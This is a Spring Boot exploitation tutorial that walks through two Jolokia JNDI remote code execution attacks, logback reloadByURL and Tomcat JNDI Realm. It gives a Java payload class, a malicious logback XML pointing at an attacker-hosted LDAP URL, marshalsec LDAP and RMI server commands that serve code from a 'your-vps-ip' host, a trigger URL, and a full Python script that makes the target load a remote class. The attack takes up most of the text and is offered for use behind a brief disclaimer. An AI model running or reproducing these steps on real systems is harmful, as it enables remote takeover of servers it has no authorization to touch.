Disclaimer: This article is for learning and reference only. All resources involved in it are from the Internet. Please do not use them for any illegal acts, otherwise you will bear the corresponding consequences yourself, and I do not assume any legal and joint liability.
Vulnerability 1: jolokia logback JNDI RCE
build environment
The vulnerability environment is:
https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-jolokia-logback-rce
IDEA loads the source code and configures a Spring boot to run the environment
After the environment is running, visit the /jolokia interface
Conditions of use
The target website exists /jolokia or /actuator/jolokia interface
The target uses the jolokia-core dependency (version requirements are not yet known) and related MBean s exist in the environment
The target can request the attacker's HTTP server (the request can go out to the external network)
Common JNDI injection is affected by the target JDK version, jdk < 6u201/7u191/8u182/11.0.1(LDAP), but the related environment can be bypassed
How to use
1. View existing MBeans
Visit the /jolokia/list interface to see if there are ch.qos.logback.classic.jmx.JMXConfigurator and reloadByURL keywords
2. Prepare the Java code to be executed
Write the java code (Evil.java) used to verify the existence of the vulnerability
public class Evil{ public Evil() throws Exception{ Runtime.getRuntime().exec("calc.exe"); } }
Compile with a method compatible with lower versions of jdk:
javac -source 1.5 -target 1.5 Evil.java
Then copy the generated Evil.class file to the attacker VPS.
3. Managed xml files
Write the poc.xml file and put it in the same directory as the Evil.class file on the VPS
<configuration> <insertFromJNDI env-entry-name="ldap://your-vps-ip:1389/aaabbb" as="appName" /> </configuration>
In the poc.xml directory, use python to start a simple http service
python3 -m http.server 8080
4. Set up malicious ldap service
Download marshalsec (https://github.com/mbechler/marshalsec), and use the following command to set up the corresponding ldap service:
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://your-vps-ip:8080/#Evil 1389
5. Replace the actual your-vps-ip address to access the URL to trigger the vulnerability
/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/your-vps-ip!/poc.xml
The result is as follows, the calculator pops up, indicating that the exploit is successful
Vulnerability 2: jolokia Realm JNDI RCE
The vulnerability environment still uses the same environment as the vulnerability.
Conditions of use
The target website exists /jolokia or /actuator/jolokia interface
The target uses the jolokia-core dependency (version requirements are not yet known) and related MBean s exist in the environment
The target can request the attacker's server (the request can go out of the Internet)
Common JNDI injection is affected by the target JDK version, jdk < 6u141/7u131/8u121(RMI), but the related environment can be bypassed
How to use
1. View existing MBeans
Visit the /jolokia/list interface to see if there are type=MBeanFactory and createJNDIRealm keywords.
2. Prepare the Java code to be executed
This step is the same as the method of loophole 1, and will not be repeated here.
3. Hosting class files
In the Evil.class file directory on the VPS, start a simple http service
python3 -m http.server 8080
4. Set up malicious rmi service
Download marshalsec (https://github.com/mbechler/marshalsec), and use the following command to set up the corresponding rmi service:
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://your-vps-ip:8080/#Evil 1389
5. Send malicious payload
Modify the target address, RMI address, port and other information in the springboot-realm-jndi-rce.py script according to the actual situation, and then run it on the server controlled by yourself.
#!/usr/bin/env python3 # coding: utf-8 # Referer: https://ricterz.me/posts/2019-03-06-yet-another-way-to-exploit-spring-boot-actuators-via-jolokia.txt import requests url = 'http://192.168.8.14:9094/jolokia' create_realm = { "mbean": "Tomcat:type=MBeanFactory", "type": "EXEC", "operation": "createJNDIRealm", "arguments": ["Tomcat:type=Engine"] } wirte_factory = { "mbean": "Tomcat:realmPath=/realm0,type=Realm", "type": "WRITE", "attribute": "contextFactory", "value": "com.sun.jndi.rmi.registry.RegistryContextFactory" } write_url = { "mbean": "Tomcat:realmPath=/realm0,type=Realm", "type": "WRITE", "attribute": "connectionURL", "value": "rmi://192.168.10.171:1389/Evil" } stop = { "mbean": "Tomcat:realmPath=/realm0,type=Realm", "type": "EXEC", "operation": "stop", "arguments": [] } start = { "mbean": "Tomcat:realmPath=/realm0,type=Realm", "type": "EXEC", "operation": "start", "arguments": [] } flow = [create_realm, wirte_factory, write_url, stop, start] for i in flow: print('%s MBean %s: %s ...' % (i['type'].title(), i['mbean'], i.get('operation', i.get('attribute')))) r = requests.post(url, json=i) r.json() print(r.status_code)
Execute python3 springboot-realm-jndi-rce.py on VPS
A calculator pops up on the target machine, and the exploit is successful